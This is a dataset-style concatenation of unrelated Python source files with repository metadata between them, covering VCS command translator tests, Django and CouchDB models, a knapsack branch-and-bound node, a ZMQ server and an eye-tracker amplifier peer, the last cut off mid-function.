self.assert_translates(t, "log", "git log --all") self.assert_translates(t, "", "git") def test_git_to_hg(self): t = Translator("git", "hg") self.assert_translates(t, "init", "hg init") self.assert_translates(t, "clone", "hg clone") self.assert_translates(t, "status", "hg status") self.assert_translates(t, "pull", "hg pull -u") self.assert_translates(t, "push", "hg push") self.assert_translates(t, "diff", "hg diff") self.assert_translates(t, "remote", "hg paths") self.assert_translates(t, "remote -v", "hg paths") self.assert_translates(t, "commit -a", "hg commit") self.assert_translates(t, "", "hg") self.assert_translates(t, "fetch", "hg pull") def test_svn_to_hg(self): t = Translator("svn", "hg") self.assert_translates(t, "commit", "hg commit && hg push") self.assert_translates(t, "checkout", "hg clone") self.assert_translates(t, "revert some/file.txt", "hg revert some/file.txt --no-backup") self.assert_translates(t, "update", "hg pull -u") self.assert_translates(t, "diff", "hg diff") self.assert_cant_handle(t, "") def test_hg_to_svn(self): t = Translator("hg", "svn") self.assert_translates(t, "diff", "svn diff") def test_git_to_bzr(self): t = Translator("git", "bzr") self.assert_translates(t, "init", "bzr init") self.assert_translates(t, "clone", "bzr branch") self.assert_translates(t, "status", "bzr status") self.assert_translates(t, "pull", "bzr pull") self.assert_translates(t, "push", "bzr push") self.assert_translates(t, "diff", "bzr diff") def test_bzr_to_git(self): t = Translator("bzr", "git") self.assert_translates(t, "pull", "git fetch") self.assert_translates(t, "commit", "git commit -a") self.assert_translates(t, "push", "git push") def test_hg_to_bzr(self): t = Translator("hg", "bzr") self.assert_translates(t, "init", "bzr init") self.assert_translates(t, "clone", "bzr branch") self.assert_translates(t, "status", "bzr status") self.assert_translates(t, "push", "bzr push") self.assert_translates(t, "diff", "bzr diff") def test_svn_to_bzr(self): t = Translator("svn", "bzr") self.assert_cant_handle(t, "") def test_cant_handle_yet(self): t = Translator("svn", "git") self.assert_cant_handle_yet(t, "commit some/file") f = FailedTranslation.objects.get() self.assertEqual(f.source, "svn") self.assertEqual(f.target, "git") self.assertEqual(f.command, "commit some/file") self.assertEqual(f.count, 1) self.assert_cant_handle_yet(t, "commit some/file") f = FailedTranslation.objects.get() self.assertEqual(f.count, 2) t = Translator("git", "svn") self.assert_cant_handle_yet(t, "commit -a") t = Translator("svn", "hg") self.assert_cant_handle_yet(t, "commit -a")
UTF-8
Python
false
false
2,014
16,071,767,638,360
87aedfbb540d6a04cf2a7b37917c0011af5b4cce
1965a9e618ab227a9adfad46b49fb577a29a808a
/src/cmaplc/mgr/assign.py
fba2de516a8ccd60f3ed464437aef2908fbaebde
[]
no_license
lpgray/cmaplc
https://github.com/lpgray/cmaplc
9bc502215cf29702d7c2de594750739a68b4e64f
1abf846d6c108b27e0251147e31a369b807c5711
refs/heads/master
2016-03-31T03:34:13.960993
2013-06-24T03:36:40
2013-06-24T03:36:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from cmaplc.entity import models from cmaplc.utils import datetime_util def update_assign_status(orderNbr,statusId,deliverer = None,failureReason = None): statusVo = models.AssignStatusVo.objects.get(pk = statusId) if statusId == 2: return assign_order(orderNbr, statusVo, deliverer) elif statusId == 1: return cancel_order(orderNbr, statusVo) elif statusId == 3: return success_order(orderNbr, statusVo) elif statusId == 4: return failure_order(orderNbr, statusVo, failureReason) def assign_order(orderNbr,statusVo,deliverer): order = models.OrderInfoVo.objects.get(pk = orderNbr) order.setAssignStatusVo(statusVo) order.setAssignTime(datetime_util.get_now_minute_str()) order.setDeliverer(deliverer) order.save() return order def cancel_order(orderNbr,statusVo): order = models.OrderInfoVo.objects.get(pk = orderNbr) order.setAssignStatusVo(statusVo) order.setAssignTime(None) order.setDeliverer(None) order.save() return order def success_order(orderNbr,statusVo): order = models.OrderInfoVo.objects.get(pk = orderNbr) order.setAssignStatusVo(statusVo) order.setSuccessTime(datetime_util.get_now_minute_str()) order.save() return order def failure_order(orderNbr,statusVo,failureReason): order = models.OrderInfoVo.objects.get(pk = orderNbr) order.setAssignStatusVo(statusVo) failureReasonVo = models.FailureReasonVo.objects.create(desc = failureReason) order.setFailureInfoVo(failureReasonVo) order.save() return order
UTF-8
Python
false
false
2,013
4,595,615,022,425
447329e5662f35b2bf9cb02e15bfe93afe677c1c
73c45259547df7961285a034a701e3a3986fe0f2
/main.py
cc8f85bea21b7247ba9a98d038e99abe26900062
[]
no_license
mrnoodles/Framework
https://github.com/mrnoodles/Framework
1f514efd5f77f684979f9efaabd004e69f2ee6fb
b99d4d05cd3b4935fb52997cf4a4c098c9ce6f16
refs/heads/master
2016-09-11T06:25:21.166346
2014-11-13T18:54:48
2014-11-13T18:54:48
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
__author__ = 'Andres' import pygame import setup import keyboard import random import math import physics pygame.init() def main(): model() view() controller() setup.CLOCK.tick(setup.FPS) pass def model(): pass def view(): pass def controller(): pass
UTF-8
Python
false
false
2,014
11,287,174,101,324
02cb7ddda61600059f1a98e56bba7e159bd1d8e6
c0a8023248de6b97fb1568a12ea15126df564b11
/tests/zmq_server.py
c905b515095b6a9192c506c51e4561c743936741
[]
no_license
bwhite/hadoopy_rt
https://github.com/bwhite/hadoopy_rt
17977ebac9c393a18a665a7d62a05891dcc67697
bf651062002e3ce67edea7116b5f181835843a7f
refs/heads/master
2021-01-19T16:32:46.859061
2012-10-23T17:58:39
2012-10-23T17:58:39
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import zmq import time import os import hadoopy_rt print('PID[%s]' % os.getpid()) ctx = zmq.Context() in_sock = ctx.socket(zmq.PULL) in_sock.bind("tcp://127.0.0.1:3001") prev_count = -1 st = time.time() tcount = 0 while True: k, v = in_sock.recv_pyobj() tcount += 1 v['server_time'] = time.time() t0 = v['worker_time'] - v['client_time'] t1 = v['server_time'] - v['worker_time'] t2 = v['server_time'] - v['client_time'] if v['count'] - 1 != prev_count: print('Mismatch count!') prev_count = v['count'] if time.time() - st >= 5: print('Throughput [%f]' % (tcount / (time.time() - st))) print((t0, t1, t2)) st = time.time() tcount = 0
UTF-8
Python
false
false
2,012
6,193,342,847,876
270635681733f35043d7965eeb3f921644f6957b
1e5a87dfe30f5525abfbdf98c8ca676781d14d51
/python/hackerrank/oj6textjustification.py
634fc3c4223bc7a9eac06af2a4de97a0f0d8ec2f
[]
no_license
panuinth/interview
https://github.com/panuinth/interview
c0915fffbcc4c53334f09fbce798b1f7569c5c79
3478eccbc5261b86fbf4080b2e2cbf709bda9c22
refs/heads/master
2021-01-25T03:48:53.447859
2014-08-22T03:31:40
2014-08-22T03:31:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
"""words: ["This", "is", "an", "example", "of", "text", "justification."] L: 16. Return the formatted lines as: [ "This is an", "example of text", "justification. " ] """ class Solution: # @param words, a list of strings # @param L, an integer # @return a list of strings def fullJustify(self, words, L):
UTF-8
Python
false
false
2,014
12,979,391,170,866
86b63058321774c48ff3ad0bccd444146b384431
bd39cff419a85267243d9cf7ed63aef6245b85b3
/newsdb/publications/models.py
c31dd4008d5b78db3eaf5bc44c3811034a5614a7
[]
no_license
ryanmark/newsdb
https://github.com/ryanmark/newsdb
236f6252957aa9818def5bc6796d537310acd1df
8b03301ec9317f2857594e55e1a5f2a98422108a
refs/heads/master
2020-04-26T17:27:02.757592
2013-10-26T21:13:15
2013-10-26T21:13:15
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.db import models from django.contrib.sites.models import Site from newsdb.models import SluggedModel from metamodel.models import ModelMeta class Publication(SluggedModel): name = models.CharField( max_length=100) sites = models.ManyToManyField(Site) def __unicode__(self): return unicode(self.name) class PublicationMeta(ModelMeta): publication = models.ForeignKey(Publication, related_name='meta') class Meta: verbose_name = "product meta-data" verbose_name_plural = "product meta-data"
UTF-8
Python
false
false
2,013
6,640,019,447,864
deae54888ee1511a0a3df1bd06c85a2367eaf180
b031af0bcbcffdb0f8e645e0173d70a11c6a4c8c
/map_editor/api_2/models.py
bb9e229f7cff36709eb48b537af9220927d4ed18
[]
no_license
mnopi/Labelee_src
https://github.com/mnopi/Labelee_src
aa45f7a420b499a23b444d0bede6af08799614df
8966bf1c5a5a38f76750d1aff48defc4dcd5d7fb
refs/heads/master
2022-08-24T01:41:53.424443
2013-12-16T15:06:15
2013-12-16T15:06:15
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- from django.shortcuts import render_to_response, get_object_or_404 from django.template.loader import get_template from django.template import Context from django.template import RequestContext from django.http import HttpResponse from django.http import HttpRequest from django.http import HttpResponseRedirect from django.core.files.base import ContentFile from utils.helpers import responseJSON import json import simplejson from map_editor.models import * from map_editor.forms import * from utils import * def place(request, operation): """ Recibe una URL /map-editor/places/[operation], la cual puede ser: * new -> añade un nuevo lugar en la BD * delete -> elimina lugar de la BD """ # return HttpResponse('index view..') # matadero = Enclosure(name='Matadero') # matadero.save() if operation == 'new': form = EnclosureForm({'name': request.POST['place_name']}) if form.is_valid(): place = form.save() # print place.id return responseJSON(data={'id': place.id}) else: return responseJSON(errors=form.errors) elif operation == 'delete': place = Enclosure.objects.get(id=request.POST['place_id']) # eliminamos todos los mapas relativos a ese lugar, incluídas sus imágenes maps = place.map_set.all() for map in maps: map.delete() place.delete() return responseJSON() elif not operation: places = Enclosure.get_all() return HttpResponse(json.dumps(places), content_type="application/json") return HttpResponse('places..') def map(request, operation): if operation == 'new': # Si la petición es AJAX creo un mapa sin imágen if request.is_ajax(): map_name = request.POST['map_name'] form = FloorForm({'name': map_name}) if form.is_valid: place = Enclosure.objects.get(id=request.POST['place_id']) map = Floor(name=map_name, place=place) map.add_default_img() map.save() print map.name print map.place return responseJSON(data={'map_id': map.id}) else: return responseJSON(errors=form.errors) # Si no es AJAX es que quiero subir la imágen para el mapa guardado previamente else: file_content = ContentFile(request.FILES['map_img'].read()) print '@@@@ - ' + request.FILES['map_img'].name map.img.save(request.FILES['map_img'].name, file_content) map.save() return HttpResponse('uploaded!') else: return HttpResponse('ande vaaa') def objectType(request, operation): if operation == 'new': # Si la petición es AJAX creo un mapa sin imágen if request.is_ajax(): map_name = request.POST['map_name'] form = FloorForm({'name': map_name}) if form.is_valid: place = Enclosure.objects.get(id=request.POST['place_id']) map = Floor(name=map_name, place=place) map.add_default_img() map.save() print map.name print map.place return responseJSON(data={'map_id': map.id}) else: return responseJSON(errors=form.errors) # Si no es AJAX es que quiero subir la imágen para el mapa guardado previamente else: file_content = ContentFile(request.FILES['map_img'].read()) print '@@@@ - ' + request.FILES['map_img'].name map.img.save(request.FILES['map_img'].name, file_content) map.save() return HttpResponse('uploaded!') else: return HttpResponse('ande vaaa') def object(request, operation): if operation == 'new': # Si la petición es AJAX creo un mapa sin imágen if request.is_ajax(): map_name = request.POST['map_name'] form = FloorForm({'name': map_name}) if form.is_valid: place = Enclosure.objects.get(id=request.POST['place_id']) map = Floor(name=map_name, place=place) map.add_default_img() map.save() print map.name print map.place return responseJSON(data={'map_id': map.id}) else: return responseJSON(errors=form.errors) # Si no es AJAX es que quiero subir la imágen para el mapa guardado previamente else: file_content = ContentFile(request.FILES['map_img'].read()) print '@@@@ - ' + request.FILES['map_img'].name map.img.save(request.FILES['map_img'].name, file_content) map.save() return HttpResponse('uploaded!') else: return HttpResponse('ande vaaa') def dynamic_validator(request, resource, pk=None): """ Devuelve de manera dinámica (cada vez que se pulsa una tecla, etc..) los errores en cada campo del formulario. URI: /dynamyc-validator/[resource]/[id] Importante: cuando llamamos a este URI usando $http de angular el contenido está en 'request.body', en lugar de 'request.POST['data'] Por ejemplo para /dynamyc-validator/place recibimos: {'name': 'nombre del lugar'} Si el lugar se está editando recibimos su id por la URI: /dynamyc-validator/place/25 Si se le pasa una pk como argumento entonces excluimos los nombres de aquellos lugares que coincidan con esa misma pk Es importante que al pasar el objeto 'obj' a EnclosureForm éste tenga en sus claves (keys) los mismos nombres que para los atributos del modelo Enclosure (creado en models.py). Al caso, si se trata del nombre del lugar, que sea la clave también sea 'name:' """ obj = simplejson.loads(request.body) if pk: place = get_object_or_404(Enclosure, pk=pk) form = EnclosureForm(obj, instance=place) else: form = EnclosureForm(obj) # # obj['pk'] = pk # # print obj # others = Enclosure.objects.filter(name=obj['name']).exclude(pk=pk) # # others = Enclosure.objects.filter(name=obj['name']) # # others = Enclosure.objects.filter(name=obj['name']).exclude(name='matadero') # # print others # form.fields['name'].queryset = others if not form.is_valid(): return responseJSON(errors=form.errors) return responseJSON()
UTF-8
Python
false
false
2,013
300,647,726,155
0231d223a4a6abb36b9f5cc65b59e329a9869d7e
302dd9452543000e05f01af1662679aebb93ffe1
/apps/listings/api/resources.py
0e1495ceba19ea3ea9294a75cf1b22ed7e69941d
[]
no_license
defrex/hipsell-server
https://github.com/defrex/hipsell-server
617182e7c3f28ebb55b49af7b02b6a66bbd710aa
98ac178d98e00416afba38ba78012302c3bee36c
refs/heads/master
2021-01-20T10:42:11.784498
2011-04-27T15:16:43
2011-04-27T15:16:43
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.contrib.auth.models import User from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned, ValidationError from django.db.models import Max from tastypie import fields from tastypie.authentication import Authentication, BasicAuthentication from tastypie.authorization import Authorization, DjangoAuthorization from tastypie.http import HttpCreated from tastypie.resources import Resource, ModelResource from tastypie.utils import dict_strip_unicode_keys from tastypie.validation import FormValidation from listings.api.authentication import TokenAuthentication from listings.api.fields import Base64FileField from listings.forms import UserForm from listings.models import Listing, Offer, Profile, Comment, Question class UserResource(ModelResource): class Meta: queryset = User.objects.all() resource_name = 'user' allowed_methods = ['post',] authentication = Authentication() authorization = Authorization() fields = ['username', 'token',] validation = FormValidation(form_class=UserForm) def dehydrate(self, bundle): bundle.data['token'] = bundle.obj.profile.token return bundle def post_list(self, request, **kwargs): deserialized = self.deserialize( request, request.raw_post_data, format=request.META.get('CONTENT_TYPE', 'application/json')) bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized)) self.is_valid(bundle, request) updated_bundle = self.obj_create(bundle, request=request) resp = self.create_response(request, self.full_dehydrate(updated_bundle.obj)) resp["location"] = self.get_resource_uri(updated_bundle) resp.status_code = 201 return resp class ListingResource(ModelResource): photo = Base64FileField('photo') user = fields.ForeignKey(UserResource, 'user') offers = fields.ToManyField('listings.api.resources.OfferResource', 'offer_set', full=True, null=True) class Meta: queryset = Listing.objects.all() resource_name = 'listing' allowed_methods = ['get', 'post',] authentication = TokenAuthentication() authorization = DjangoAuthorization() def dehydrate(self, bundle): offers = bundle.data['offers'] bundle.data['best_offer'] = offers[0] if offers else None del bundle.data['offers'] return bundle def obj_create(self, bundle, request=None, **kwargs): bundle.data['user'] = UserResource().get_resource_uri(request.user) return super(ListingResource, self).obj_create(bundle, request, **kwargs) def is_authenticated(self, request, **kwargs): if request.method == 'GET': return True else: return super(ListingResource, self).is_authenticated(request, **kwargs) class OfferResource(ModelResource): user = fields.ForeignKey(UserResource, 'user') listing = fields.ForeignKey(ListingResource, 'listing') class Meta: queryset = Offer.objects.all() resource_name = 'offer' authentication = TokenAuthentication() authorization = DjangoAuthorization() class CommentResource(ModelResource): user = fields.ForeignKey(UserResource, 'user') offer = fields.ForeignKey(OfferResource, 'offer') class Meta: queryset = Comment.objects.all() resource_name = 'comment' authentication = TokenAuthentication() authorization = DjangoAuthorization() class QuestionResource(ModelResource): user = fields.ForeignKey(UserResource, 'user') listing = fields.ForeignKey(ListingResource, 'listing') class Meta: queryset = Question.objects.all() resource_name = 'question' authentication = TokenAuthentication() authorization = DjangoAuthorization()
UTF-8
Python
false
false
2,011
481,036,373,802
8db7b7266c4ee15d22216d3469cb44b226ff29b3
6a6e37c23e90208588655865f7ad26745804f404
/image_filer/forms.py
a63b30dcba3b364c5c2a419f5fec2acadb2b8b47
[ "MIT" ]
permissive
salvaorenick/django-image-filer
https://github.com/salvaorenick/django-image-filer
0bc20859f4bc09284cad3a41c5e598655da124d0
451898ec1b9508a5f5c1f7feaabfe84191ad73ac
refs/heads/master
2021-01-18T09:49:43.246053
2010-12-10T20:38:29
2010-12-10T20:38:29
1,157,163
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.forms.models import ModelForm from image_filer.models import ImagePublication from django import forms from django.contrib.admin.widgets import ForeignKeyRawIdWidget # Not Used class ImagePublicationForm(ModelForm): image = ForeignKeyRawIdWidget('Image') class Meta: model = ImagePublication exclude = ('page', 'position', 'placeholder', 'language', 'plugin_type') def __init__(self, *args, **kwargs): #print "test: ", ImagePublication.image.rel return super(ImagePublicationForm, self).__init__(*args, **kwargs) #self.fields['image'].widget = ForeignKeyRawIdWidget('Image')
UTF-8
Python
false
false
2,010
6,743,098,678,961
9ab1b5c97b3274e20b21ec3ed3b86f386698d7a0
7347ce181cdfc10ea491fc4aa9120e9cec73423b
/tests/test_ellipse_item.py
ba1c325b3bda52accdec84f7105cdcf834fc6a16
[ "LGPL-2.0-only" ]
non_permissive
GNOME/pygoocanvas
https://github.com/GNOME/pygoocanvas
23e12c5c559dc3bbf53ea6a5906f32cff9dad534
d773d9d305bfe7e29805c78f2349ff9a2b418067
refs/heads/master
2018-12-28T05:02:56.063440
2010-11-11T13:30:17
2010-11-11T13:30:17
4,579,676
6
2
null
false
2017-02-13T00:06:10
2012-06-07T00:43:38
2016-12-05T11:12:22
2017-02-12T03:52:03
1,044
5
1
0
Python
null
null
import goocanvas import cairo import unittest import pango import gtk class TestEllipse(unittest.TestCase): def make_ellipse_item(self, **kwargs): item = goocanvas.Ellipse(**kwargs) return item ''' Test goocanvas.Ellipse properties ''' def test_ellipse_radius_x_property(self): item = self.make_ellipse_item(radius_x=100) self.failUnlessEqual(item.props.radius_x, 100.0) item.props.radius_x = 200 self.failUnlessEqual(item.props.radius_x, 200.0) def test_ellipse_radius_y_property(self): item = self.make_ellipse_item(radius_y=100) self.failUnlessEqual(item.props.radius_y, 100.0) item.props.radius_y = 200 self.failUnlessEqual(item.props.radius_y, 200.0) def test_ellipse_center_x_property(self): item = self.make_ellipse_item(center_x=100) self.failUnlessEqual(item.props.center_x, 100.0) item.props.center_x = 200 self.failUnlessEqual(item.props.center_x, 200.0) def test_ellipse_center_y_property(self): item = self.make_ellipse_item(center_y=100) self.failUnlessEqual(item.props.center_y, 100.0) item.props.center_y = 200 self.failUnlessEqual(item.props.center_y, 200.0)
UTF-8
Python
false
false
2,010
987,842,479,534
099678d6c8c07f6960c6257474a44a5bc2e862b8
21d1c7c294fd3ef165e1a03892f0736b5b800b95
/dbmail/__init__.py
b150b672c51ca8b48e693c5dd73efb7d042b3d29
[ "GPL-2.0-only" ]
non_permissive
maximzxc/django-db-mailer
https://github.com/maximzxc/django-db-mailer
9184da96fb8015b621347da7203bf0911713b2d8
0047d155954c5321c45b64c0479e66acc309a079
refs/heads/master
2021-01-21T02:57:12.431723
2014-09-25T14:59:08
2014-09-25T14:59:08
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from datetime import datetime VERSION = (2, 0, 'b') def get_version(): return '.'.join(map(str, VERSION)) def app_installed(app): from django.conf import settings return app in settings.INSTALLED_APPS def celery_supported(): try: import tasks if not app_installed('djcelery'): raise ImportError return True except ImportError: return False def send_db_mail(slug, recipient, *args, **kwargs): from dbmail.defaults import CELERY_QUEUE, SEND_MAX_TIME from dbmail.models import MailTemplate from dbmail.send_mail import SendMail args = (slug, recipient) + args send_after = kwargs.pop('send_after', None) send_at_date = kwargs.pop('send_at_date', None) use_celery = kwargs.pop('use_celery', True) if celery_supported() and use_celery: import tasks template = MailTemplate.get_template(slug=slug) max_retries = kwargs.get('max_retries', None) if max_retries is None and template.num_of_retries: kwargs['max_retries'] = template.num_of_retries options = { 'args': args, 'kwargs': kwargs, 'queue': kwargs.pop('queue', CELERY_QUEUE), 'time_limit': kwargs.get('time_limit', SEND_MAX_TIME), 'priority': template.priority, } if send_at_date is not None and isinstance(send_at_date, datetime): options.update({'eta': send_at_date}) if send_after is not None: options.update({'countdown': send_after}) return tasks.send_db_mail.apply_async(**options) else: return SendMail(*args, **kwargs).send()
UTF-8
Python
false
false
2,014
9,964,324,146,653
d4a463143b0e6571045971920dc3c9c3be18c66b
99c450ae27e36ebc7ce50d4f60523e20df31e38a
/discrete_opt_2014/discrete_opt_course/hw1/branchAndBoundNode.py
b44e6df717632a181b9c8addbbc9afe97a0577db
[]
no_license
ronin2448/coursera_courses
https://github.com/ronin2448/coursera_courses
d0447a3824d202c09f53c56a07bfab672f3e4b7f
0e4d477104959bb77e88500f891fa8f55a4abfbe
refs/heads/master
2020-05-19T19:07:51.447670
2014-04-09T04:51:27
2014-04-09T04:51:27
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
''' Created on Apr 8, 2014 @author: domingolara ''' from collections import namedtuple class Decision(object): def __init__(self, item, decision): self.item = item self.decision = decision class ProblemNode(object): ''' classdocs ''' def __init__(self, previouslyDecidedItems, pendingItemDecisions, parentNode): ''' Constructor ''' self.previouslyDecidedItems = previouslyDecidedItems self.parent = parentNode self.isFeasible = True self.pendingItemDecisions = pendingItemDecisions self.leftChildNode = None self.rightChildNode = None def labelAsInFeasible(self): self.isFeasible = False def isSolutionFeasible(self): return self.isFeasible def isLeafNode(self): if( len(self.pendingItemDecisions)==0): return True else: return False def getLeftChildNode(self): if( self.isLeafNode() ): self.leftChildNode = None else: childsPendingDecisions = list(self.pendingItemDecisions) takeIt = Decision(childsPendingDecisions.pop(),1) itemsInSackAfterTakingIt = list(self.previouslyDecidedItems) itemsInSackAfterTakingIt.append(takeIt) self.leftChildNode = ProblemNode(itemsInSackAfterTakingIt, childsPendingDecisions , self) return self.leftChildNode def getRightChildNode(self): if( self.isLeafNode() ): self.rightChildNode = None else: childsPendingDecisions = list(self.pendingItemDecisions) dontTakeIt = Decision(childsPendingDecisions.pop(),0) itemsInSackAfterNoTTakingIt = list(self.previouslyDecidedItems) itemsInSackAfterNoTTakingIt.append(dontTakeIt) self.rightChildNode = ProblemNode(itemsInSackAfterNoTTakingIt, childsPendingDecisions , self) return self.rightChildNode def showKnapSack(self): size = len(self.pendingItemDecisions) + len(self.previouslyDecidedItems) knapSack = [] for i in range(0,size): knapSack.append(0) for d in self.previouslyDecidedItems: knapSack[d.item.index] = d.decision outStr = "" for i in range(0,size): outStr += " "+ str(knapSack[i]) return outStr.strip() def getOptimisticEstimate(self, capacity): curVal = self.getCurrentKnapSackValue() curWgt = self.getCurrentKnapSackWeight() sortedItemList = sorted(list(self.pendingItemDecisions), key= lambda x : ((x.value*1.0)/x.weight)*1.0, reverse=True) if(len(sortedItemList) == 0): return curVal while curWgt < capacity: if(len(sortedItemList) == 0 ): break nextItem = sortedItemList.pop(0) wgtIncrease = nextItem.weight if((curWgt + wgtIncrease) < capacity ): curVal += nextItem.value curWgt += wgtIncrease else: amtToTake = ((capacity - curWgt)*1.0)/(wgtIncrease*1.0) curVal += amtToTake*nextItem.value curWgt = capacity return curVal; def getCurrentKnapSackValue(self): val = 0 for d in self.previouslyDecidedItems: val += d.decision*d.item.value return val def getCurrentKnapSackWeight(self): wgt = 0 for d in self.previouslyDecidedItems: wgt += d.decision*d.item.weight return wgt
UTF-8
Python
false
false
2,014
609,885,399,316
82a52767d122eb8eae9b6fc44b9c081d88f4d73a
5106e69da58c288f8c4b7a7304a2661d8e144e06
/passwords/models.py
20b84a0e86a186915cec9353cdb6914980210092
[]
no_license
gavinwahl/safe-deposit-box
https://github.com/gavinwahl/safe-deposit-box
cab312656cbe953f0475255b190a8b52010e3fde
a06c97c3fe29d2d57f5960d7f37229d3ff9b9a24
refs/heads/master
2021-01-01T15:36:17.966520
2011-09-24T22:53:09
2011-09-24T23:49:54
2,452,412
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import couchdb, couchdb.design server = couchdb.Server() try: db = server.create('passwords') except couchdb.PreconditionFailed: db = server['passwords'] users_by_name = couchdb.design.ViewDefinition('users', 'users_by_name', """ function(doc) { if ( doc.type == 'user' ) emit([doc._id, 0]); if ( doc.type == 'password' ) emit([doc.user, 1]); }""") users_by_name.sync(db) class ValidationError(Exception): pass class ObjectDoesNotExist(Exception): pass class CouchManager(object): def __init__(self): self.model = None def get_by_id(self, id): try: doc = db[id] except couchdb.ResourceNotFound as e: if e.args == (('not_found', 'missing'),): raise self.model.DoesNotExist() else: raise obj = self.model() for field in doc: setattr(obj, field, doc[field]) return obj def __get__(self, obj, type=None): if obj is None: # I think mutating self here will cause problems with model inheritance self.model = type return self else: raise Exception("Can't access manager from instance") class CouchModelMeta(type): def __new__(cls, name, bases, dict): new = type.__new__(cls, name, bases, dict) if not hasattr(new, 'objects'): new.objects = CouchManager() new.DoesNotExist = type('%s.DoesNotExist' % (name), (ObjectDoesNotExist,), {}) return new class CouchModel(object): __metaclass__ = CouchModelMeta def __init__(self, **kwargs): self._id = None self._rev = None self.type = self.__class__.__name__.lower() for column in kwargs: setattr(self, column, kwargs[column]) def save(self): self.validate() (self._id, self._rev) = db.save(self.as_dict()) def validate(self): pass def as_dict(self): data = {} if self._rev: data['_rev'] = self._rev if self._id: data['_id'] = self._id return data class UserManager(CouchManager): def with_passwords(self, user_name): """ Get a user by name along with all their passwords. It'd be nice to user objects.get_by_id(users_by_name).with_passwords(), like a django queryset, but I'm not sure how to do that yet. """ rows = db.view('users/users_by_name', startkey=(user_name, 0), endkey=(user_name, 2), include_docs=True) rows = list(rows) if not rows: raise self.model.DoesNotExist user = User(**(rows[0].doc)) user._passwords = [row.doc for row in rows[1:]] return user class User(CouchModel): objects = UserManager() def as_dict(self): data = super(User, self).as_dict() data.update({ '_id': self._id, 'type': 'user' }) return data def validate(self): if not self._id: raise ValidationError @property def name(self): return self._id @name.setter def name(self, value): self._id = value @property def passwords(self): try: return self._passwords except AttributeError: rows = db.view('users/users_by_name', startkey=(self.name, 0), endkey=(self.name, 2), include_docs=True) self._passwords = [row.doc for row in rows] return self._passwords class Password(CouchModel): def as_dict(self): data = super(Password, self).as_dict() data.update({ 'type': 'password', 'password': self.password, 'user': self.user, }) return data
UTF-8
Python
false
false
2,011
7,507,602,884,445
42f25abe90f573b00460db59f843ea9072df789a
98c6ea9c884152e8340605a706efefbea6170be5
/examples/data/Assignment_8/grgvic001/question2.py
b8a938656de8ef012d703c6acd60e94dc0da95e0
[]
no_license
MrHamdulay/csc3-capstone
https://github.com/MrHamdulay/csc3-capstone
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
refs/heads/master
2021-03-12T21:55:57.781339
2014-09-22T02:22:22
2014-09-22T02:22:22
22,372,174
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#count number of double characters with recursion #victor gueorguiev #03 May 2014 def count_double_char(n): if len(n) <= 1: return 0 if n[0] == n[1]: return 1 + count_double_char(n[2:]) else: return count_double_char(n[1:]) def main(): x = input('Enter a message:\n') print('Number of pairs:',str(count_double_char(x))) main()
UTF-8
Python
false
false
2,014
8,280,696,986,407
c55ae24beca1ab1a7f0494437b8d5004192d221d
93f8128c0b187cb4aeaf0d27e046d4e90c91ec71
/drivers/eat/tracking_unified.py
b701e55f9df4a6edf416fee6d2b5af5555ecacf3
[]
no_license
FreeBCI/openbci
https://github.com/FreeBCI/openbci
56cedea748d449753daab91382acfc66887515c5
c9261199d99d18b09575604d075deb25e38f21a1
HEAD
2016-09-08T04:11:05.998775
2013-08-28T07:35:10
2013-08-28T07:35:10
12,414,484
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- import random, time import sys, signal from multiplexer.multiplexer_constants import peers, types from obci.control.peer.configured_client import ConfiguredClient from tobii import eye_tracking_io import tobii.eye_tracking_io.eyetracker import tobii.eye_tracking_io.mainloop import tobii.eye_tracking_io.browsing import tobii.eye_tracking_io.types #dummy import when no access to a real eyetracker #import eye_tracking_io.eyetracker #import eye_tracking_io.mainloop #import eye_tracking_io.browsing #import eye_tracking_io.types from obci.configs import settings, variables_pb2 import logging import threading class EtrAmplifierTobii(ConfiguredClient): @staticmethod def extract_channels(d): return [d.LeftEyePosition3D.x, d.LeftEyePosition3D.y, d.LeftEyePosition3D.z, d.LeftEyePosition3DRelative.x, d.LeftEyePosition3DRelative.y, d.LeftEyePosition3DRelative.z, d.LeftGazePoint3D.x, d.LeftGazePoint3D.y, d.LeftGazePoint3D.z, d.LeftGazePoint2D.x, d.LeftGazePoint2D.y, d.LeftPupil, float(d.LeftValidity), d.RightEyePosition3D.x, d.RightEyePosition3D.y, d.RightEyePosition3D.z, d.RightEyePosition3DRelative.x, d.RightEyePosition3DRelative.y, d.RightEyePosition3DRelative.z, d.RightGazePoint3D.x, d.RightGazePoint3D.y, d.RightGazePoint3D.z, d.RightGazePoint2D.x, d.RightGazePoint2D.y, d.RightPupil, float(d.RightValidity) ] def __init__(self, addresses): super(EtrAmplifierTobii, self).__init__(addresses=addresses, type=peers.AMPLIFIER) self.logger.info("Start initializing eat amplifier...") #....init etr self._init_signals() self.connector = TrackingConnector() self.ready() self.apply_calibration() def apply_calibration(self): calibration_data_path = self.get_param("calibration_data_path") if calibration_data_path: self.connector.upload_calibration(calibration_data_path) def _process_message(self, msg): self.logger.debug("ETR sending message...") self.conn.send_message(message = msg.SerializeToString(), type = types.AMPLIFIER_SIGNAL_MESSAGE, flush=True) def _init_signals(self): signal.signal(signal.SIGTERM, self.signal_handler()) signal.signal(signal.SIGINT, self.signal_handler()) def signal_handler(self): def handler(signum, frame): self.logger.info("Got signal " + str(signum) + "!!! TUrning etr off!") # some cleanup ... sys.exit(-signum) return handler def _gaze_to_packets(self, source): sample_count = 0 packet = variables_pb2.SampleVector() samples_per_packet = int(self.get_param("samples_per_packet")) for gaze_data in source: sample = packet.samples.add() 